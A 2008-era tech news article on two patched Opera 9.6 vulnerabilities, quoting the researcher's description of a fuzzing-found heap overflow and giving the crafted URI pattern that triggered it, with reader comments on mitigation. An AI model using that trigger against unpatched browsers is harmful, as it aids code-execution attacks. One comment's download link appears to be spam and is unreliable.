Must Read: Apple to Congress: We do not use 'tax gimmicks'

Topic: Security

Opera bitten by 'extremely severe' browser bug

Summary: Buried in the flurry of feature-related news surrounding the release of Opera 9.6 is the fact that the update fixes an "extremely severe" vulnerability that could expose Opera users to code execution attacks.

Ryan Naraine

By for Zero Day |

Extremely severe bug bites Opera browserBuried in the flurry of feature-related news surrounding the release of Opera 9.6 is the fact that the update fixes an "extremely severe" vulnerability that could expose Opera users to code execution attacks.

According to an Opera advisory, which is not mentioned anywhere in Opera's giddy press release, there's a patch out for an issue where specially crafted addresses could execute arbitrary code.

Here's how Opera describes the vulnerability, which was discovered and reported by Matasano's Chris Rohlf:

If a malicious page redirects Opera to a specially crafted address (URL), it can cause Opera to crash. Given sufficient address content, the crash could cause execution of code controlled by the attacking page.

Rohlf has more details on the Matasano Chargen blog:

In this case the vulnerability is based on a 'specially crafted URI' which of course can be triggered by any attacker controlled content. It is reproducible on both x86 Linux and Win XP SP2 and Vista.

This flaw was found using some rudimentary fuzzing, simple stuff really. I basically whipped up a few lines of Javascript to create different URI’s with incrementing string lengths (yes I’m serious). And thanks to Immunity Debugger I was able to boil it down to a heap overflow in no time.

The offending URI was ‘http://BBB*BBB:password@example.com’. This took minimal effort to find and underscores the importance of simple fuzzing test cases being built into your SDLC.

The Opera 9.6 update also fixes a second security bug reported by ex-Zero Day blogger Nate McFeters.

Opera rates this bug as "highly severe" and warns that Java applets can be used to read sensitive information:

Once a Java applet has been cached, if a page can predict the cache path for that applet, it can load the applet from the cache, causing it to run in the context of the local machine. This allows it to read other cache files on the computer or perform other normally more restrictive actions. These files could contain sensitive information, which could then be sent to the attacker.

Topics: Security, Browser

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

6 comments
Log in or register to join the discussion

  • Thanks for the heads up

    Upgrading to Opera 9.6 now.
    balaknair
    Reply Vote

  • RE: Opera bitten by 'extremely severe' browser bug

    Did that yesterday when they released it. However I wish that they could patch the "Clickjecking" vulnerability. I know this "Clickjacking" vulnerability is part of the older HTML spec but patching it will help us until we can have all of the websites updated to the new HTML spec.
    phatkat
    Reply Vote

  • Once again, don't run with administrative rights

    There's Ryan's favorite hole again, "abitrary code execution" and no mention of "don't run with admin rights".

    You're not invulnerable by not having administrative rights, but you can mitigate the chances of having something like a keyboard logger on your system on account of running an unpatched browser.

    Use the following tool:

    http://www.download.com/RemoveAdmin/3000-2381_4-10824971.html?tag=lst-1&cdlPid=10835515

    While the installer for RemoveAdmin sets up shortcuts for IE and Firefox only, just view either shortcut's properties to note RemoveAdmin is really a general purpose tool and you can setup a shortcut to launch Opera (or anything) and strip administrative rights when doing so if you're running it on Windows XP, Windows 2000 or Windows Vista with UAC off.

    -M
    betelgeuse68
    Reply Vote

  • Bitten by Opera

    I found Opera 9.52 ideal for accessing the web. I use Sky as my ISP and they connect with Google for a webmail service. This worked very well for me until I tried to update to 9.6. Then I could login, connect to my calendar and wait for ever for the email link to fail to work. I tried Firefox and found it was not a Sky or Google failure. Going back to Opera 9.52 solved the problem so I will have to avoid the "extremely severe" bug by other means.
    misceng
    Reply Vote

    • Here's how to mitigate

      Download and install this tool:

      http://www.download.com/RemoveAdmin/3000-2381_4-10824971.html?tag=lst-1&cdlPid=10835515

      Create a shortcut on your desktop. Right click on it, select "Properties", go to the "Target" edit field and enter this

      "c:\Program Files\RemoveAdmin\removeAdmin.exe" "C:\Program Files\Opera\Opera.exe"

      That's ONE line by the way and don't forget the space between the second double quote and the third one. You're passing a command line argument to RemoveAdmin.

      This will strip administrative rights off Opera and mitigate "abitrary code execution".

      You can change the icon to use Opera's icon. Just hit the "Change Icon" button. Windows will tell you removeAdmin.exe has no icons, that's ok. A popup allows you to specify some other .EXE to get icons from. Just enter the path to Opera, i.e.:

      "C:\Program Files\Opera\Opera.exe"

      Now you can pick the icon you want and your shortcut looks "polished". Call it "SecureOpera" or some such.

      I use this tool to strip admin rights on any application that talks on the Internet (think condom).

      -M
      betelgeuse68
      Reply Vote

  • RE: Opera bitten by 'extremely severe' browser bug

    Tabbed browsing, Quick Find, fraud protection, saved sessions, Speed Dial, notes and the trash make from Opera Browser, a browser more better than it was. Significant speed allow you to spend more time online. I installed it, it works very well and i got it from here: <a href="http://www.rosoftdownload.com/download/Windows/Opera-Browser">Opera Browser</a>
    yman25
    Reply Vote
CNET Join | Log In | Privacy | Cookies Close